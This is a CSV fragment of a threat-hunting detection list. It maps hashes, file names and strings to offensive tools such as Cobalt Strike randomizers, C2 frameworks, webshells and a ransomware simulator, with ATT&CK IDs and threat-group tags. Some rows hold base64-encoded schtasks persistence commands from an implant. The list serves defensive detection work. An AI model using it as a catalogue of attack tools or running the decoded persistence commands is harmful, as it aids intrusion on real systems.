"*c2c9d4ca6ba2ca502be8d0a9670f7e8a5f7ab0bf315690b1c9df7b53ccf9c5cd*",".{0,1000}c2c9d4ca6ba2ca502be8d0a9670f7e8a5f7ab0bf315690b1c9df7b53ccf9c5cd.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","36827" "*c2cf51bf8a314ce15a028b75bb2b29f386269608c9bff979acbe9692172ee6ec*",".{0,1000}c2cf51bf8a314ce15a028b75bb2b29f386269608c9bff979acbe9692172ee6ec.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","36829" "*C2concealer -*",".{0,1000}C2concealer\s\-.{0,1000}","offensive_tool_keyword","C2concealer","C2concealer is a command line tool that generates randomized C2 malleable profiles for use in Cobalt Strike.","T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001","TA0042 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/RedSiege/C2concealer","1","0","N/A","N/A","10","10","1053","172","2024-06-25T11:10:54Z","2020-03-23T14:13:16Z","36830" "*C2concealer-master*",".{0,1000}C2concealer\-master.{0,1000}","offensive_tool_keyword","C2concealer","C2concealer is a command line tool that generates randomized C2 malleable profiles for use in Cobalt Strike.","T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001","TA0042 - TA0005 - 
TA0011","N/A","N/A","C2","https://github.com/RedSiege/C2concealer","1","1","N/A","N/A","10","10","1053","172","2024-06-25T11:10:54Z","2020-03-23T14:13:16Z","36831" "*c2d02d102fc5d471aae2cf7448c9a5d5f9b9ae7a0138b1c78ae122a47fd25142*",".{0,1000}c2d02d102fc5d471aae2cf7448c9a5d5f9b9ae7a0138b1c78ae122a47fd25142.{0,1000}","offensive_tool_keyword","nps","Chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","36832" "*C2DAC5B0DBA2FC51AAA3FAF6AA1372E43D7A2B33F288FCEC5ADD4B7360440DBA*",".{0,1000}C2DAC5B0DBA2FC51AAA3FAF6AA1372E43D7A2B33F288FCEC5ADD4B7360440DBA.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","#filehash","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","36833" "*c2db7182d606ef3d00a40360e62f16a47aea5d39872bb5bab4b115d4da864394*",".{0,1000}c2db7182d606ef3d00a40360e62f16a47aea5d39872bb5bab4b115d4da864394.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline separated JSONS and automatically brute-forces services with default credentials using Medusa. 
BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","#filehash","N/A","10","10","2231","405","2025-04-21T03:17:20Z","2017-04-05T17:05:10Z","36834" "*c2dc48ba4a9ef1c03de0fe5d6df430df3a2d61792d2220d321702adcdc582162*",".{0,1000}c2dc48ba4a9ef1c03de0fe5d6df430df3a2d61792d2220d321702adcdc582162.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","36835" "*'C2Default'*",".{0,1000}\'C2Default\'.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","Black Basta","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","N/A","10","10","806","170","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z","36836" "*c2e755a58685ea4f356c897fdc0c9420579f6eae48ac6f27307e8a8b73500cb6*",".{0,1000}c2e755a58685ea4f356c897fdc0c9420579f6eae48ac6f27307e8a8b73500cb6.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Toolkit allows two users behind NAT/Firewall to establish a TCP connection with each other. 
Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","36838" "*c2endpoint.php*",".{0,1000}c2endpoint\.php.{0,1000}","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","N/A","10","10","1161","119","2025-02-03T12:03:19Z","2021-02-09T15:54:23Z","36840" "*C2F24BBD-4807-49F5-B5E2-77FF0E8B756B*",".{0,1000}C2F24BBD\-4807\-49F5\-B5E2\-77FF0E8B756B.{0,1000}","offensive_tool_keyword","NamedPipeMaster","a tool used to analyze monitor and interact with named pipes - allows dll injection and impersonation","T1055.001 - T1134.001 - T1010 - T1550.002","TA0007 - TA0008 - TA0004 - TA0005","N/A","N/A","Exploitation tool","https://github.com/zeze-zeze/NamedPipeMaster","1","0","#GUIDproject","N/A","9","2","161","15","2024-10-27T05:24:11Z","2024-08-23T02:03:44Z","36842" "*c2fc425c6790459d69b7511d6b7626d4f140442c65a7751d69541ceab1bc47bd*",".{0,1000}c2fc425c6790459d69b7511d6b7626d4f140442c65a7751d69541ceab1bc47bd.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","36843" "*C2FunctionAgent*",".{0,1000}C2FunctionAgent.{0,1000}","offensive_tool_keyword","ServerlessRedirector","Serverless Redirector in various cloud vendor for red team","T1090.003 - T1095 - T1001.003","TA0010 - TA0011 - TA0008","N/A","N/A","Defense Evasion","https://github.com/KINGSABRI/ServerlessRedirector","1","0","#useragent","N/A","10","1","72","10","2022-12-08T08:56:02Z","2022-12-08T07:52:49Z","36844" "*c2hlbGxjb2Rl*",".{0,1000}c2hlbGxjb2Rl.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. 
and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","N/A","10","10","916","138","2024-08-12T13:07:54Z","2019-03-31T14:23:57Z","36845" "*c2lint *",".{0,1000}c2lint\s.{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - 
APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","0","N/A","N/A","10","10","444","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z","36846" "*C2ListenerPort*",".{0,1000}C2ListenerPort.{0,1000}","offensive_tool_keyword","cobaltstrike","A tool that can perform reverse proxy and cs online without going online","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - 
Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Daybr4ak/C2ReverseProxy","1","1","N/A","N/A","10","10","486","56","2023-04-26T13:16:26Z","2020-01-16T05:43:35Z","36847" "*c2-logs.txt*",".{0,1000}c2\-logs\.txt.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","Black Basta","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","N/A","10","10","806","170","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z","36848" "*c2NodGFza3MgL2NyZWF0ZSAvdG4gIk9uZURyaXZlIFN0YW5kYWxvbmUgVXBkYXRlIFRhc2siIC90ciAid3NjcmlwdCAlQVBQREFUQSVcV2luZG93czp3aW5ybS52YnMiIC9zYyBEQUlMWQ*",".{0,1000}c2NodGFza3MgL2NyZWF0ZSAvdG4gIk9uZURyaXZlIFN0YW5kYWxvbmUgVXBkYXRlIFRhc2siIC90ciAid3NjcmlwdCAlQVBQREFUQSVcV2luZG93czp3aW5ybS52YnMiIC9zYyBEQUlMWQ.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","36849" "*c2NodGFza3MgL2NyZWF0ZSAvdG4gIk9uZURyaXZlIFN0YW5kYWxvbmUgVXBkYXRlIFRhc2siIC90ciAid3NjcmlwdCAlQVBQREFUQSVcV2luZG93czp3aW5ybS52YnMiIC9zYyBPTlNUQVJUIC9ydSBzeXN0ZW0*",".{0,1000}c2NodGFza3MgL2NyZWF0ZSAvdG4gIk9uZURyaXZlIFN0YW5kYWxvbmUgVXBkYXRlIFRhc2siIC90ciAid3NjcmlwdCAlQVBQREFUQSVcV2luZG93czp3aW5ybS52YnMiIC9zYyBPTlNUQVJUIC9ydSBzeXN0ZW0.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - 
T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","36850" "*c2NodGFza3MgL2RlbGV0ZSAvVE4gIk9uZURyaXZlIFN0YW5kYWxvbmUgVXBkYXRlIFRhc2siIC9m*",".{0,1000}c2NodGFza3MgL2RlbGV0ZSAvVE4gIk9uZURyaXZlIFN0YW5kYWxvbmUgVXBkYXRlIFRhc2siIC9m.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","36851" "*c2profile.profile*",".{0,1000}c2profile\.profile.{0,1000}","offensive_tool_keyword","crossc2","generate CobaltStrike's cross-platform payload","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/gloxec/CrossC2","1","1","N/A","N/A","10","10","2383","352","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z","36852" "*C2ProfileManager.*",".{0,1000}C2ProfileManager\..{0,1000}","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Apollo/","1","0","N/A","N/A","10","10","472","100","2025-04-10T19:47:06Z","2020-11-09T08:05:16Z","36853" "*C2ProfileResponse.cs*",".{0,1000}C2ProfileResponse\.cs.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","36854" 
"*-c2-randomizer.py*",".{0,1000}\-c2\-randomizer\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","N/A","10","10","444","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z","36855" "*C2ReverseClint*",".{0,1000}C2ReverseClint.{0,1000}","offensive_tool_keyword","cobaltstrike","A tool that can perform reverse proxy and cs online without going online","T1548.002 - T1548.003 - T1134.001 - 
T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Daybr4ak/C2ReverseProxy","1","1","N/A","N/A","10","10","486","56","2023-04-26T13:16:26Z","2020-01-16T05:43:35Z","36856" "*C2ReverseProxy*",".{0,1000}C2ReverseProxy.{0,1000}","offensive_tool_keyword","cobaltstrike","A tool that can perform reverse proxy and cs online without going online","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - 
T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Daybr4ak/C2ReverseProxy","1","1","N/A","N/A","10","10","486","56","2023-04-26T13:16:26Z","2020-01-16T05:43:35Z","36857" "*C2ReverseServer*",".{0,1000}C2ReverseServer.{0,1000}","offensive_tool_keyword","cobaltstrike","A tool that can perform reverse proxy and cs online without going online","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - 
T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Daybr4ak/C2ReverseProxy","1","1","N/A","N/A","10","10","486","56","2023-04-26T13:16:26Z","2020-01-16T05:43:35Z","36858" "*C2script/proxy.*",".{0,1000}C2script\/proxy\..{0,1000}","offensive_tool_keyword","cobaltstrike","A tool that can perform reverse proxy and cs online without going online","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt 
Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Daybr4ak/C2ReverseProxy","1","1","N/A","N/A","10","10","486","56","2023-04-26T13:16:26Z","2020-01-16T05:43:35Z","36859" "*C2Server by @JoelGMSec*",".{0,1000}C2Server\sby\s\@JoelGMSec.{0,1000}","offensive_tool_keyword","PSRansom","PSRansom is a PowerShell Ransomware Simulator with C2 Server capabilities. This tool helps you simulate encryption process of a generic ransomware in any system on any system with PowerShell installed on it. Thanks to the integrated C2 server. 
you can exfiltrate files and receive client information via HTTP.","T1486 - T1107 - T1566.001","TA0011 - TA0010","N/A","N/A","Ransomware","https://github.com/JoelGMSec/PSRansom","1","0","N/A","N/A","9","5","478","116","2024-01-19T09:50:26Z","2022-02-27T11:52:03Z","36860" "*'c2server'*",".{0,1000}\'c2server\'.{0,1000}","offensive_tool_keyword","cobaltstrike","Convert Cobalt Strike profiles to modrewrite scripts","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/threatexpress/cs2modrewrite","1","0","N/A","N/A","10","10","599","117","2023-01-30T17:47:51Z","2017-06-06T14:53:57Z","36861" 
